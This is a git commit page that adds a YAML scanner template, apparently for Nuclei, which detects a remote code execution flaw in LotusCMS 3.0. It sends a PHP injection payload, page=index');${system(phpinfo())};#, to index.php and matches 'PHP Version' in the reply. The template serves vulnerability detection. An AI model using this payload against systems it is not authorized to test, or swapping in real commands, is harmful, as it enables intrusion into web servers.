Create lotuscms-rce.yaml

patch-1
PikPikcU 2021-07-04 11:11:19 +00:00 committed by GitHub
parent 96f0fca5ba
commit ecdd86167a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: lotuscms-rce
info:
name: LotusCMS 3.0 - RCE
author: pikpikcu
severity: critical
reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit
tags: lotuscms,rce
requests:
- method: POST
path:
- "{{BaseURL}}/index.php"
# - "{{BaseURL}}/lcms/index.php"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
page=index');${system(phpinfo())};#
matchers-condition: and
matchers:
- type: word
words:
- "PHP Version"
part: body
- type: status
status:
- 200